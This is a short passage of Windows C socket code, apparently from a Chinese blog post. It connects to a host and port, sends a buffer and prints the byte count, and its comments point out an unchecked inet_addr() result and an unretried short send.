    /* inet_addr() result is stored unchecked. */
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(nPort);
    addr_in.sin_addr.S_un.S_addr = inet_addr(szHost);

    if (connect(s, (SOCKADDR *)&addr_in, sizeof(SOCKADDR)))
    {
        printf("error: failed connect\n");
        goto _exit;
    }

    /* A short send (nBytesSend < nLen) is only printed, not retried. */
    if ((nBytesSend = send(s, szBuffer, nLen, 0)) == SOCKET_ERROR)
    {
        printf("error: failed send\n");
        goto _exit;
    }

    printf("[+] totally %d bytes has been sended\n", nBytesSend);

_exit:
    closesocket(s);
    WSACleanup();
}
原文地址:https://www.cnblogs.com/luoluo/p/315760.html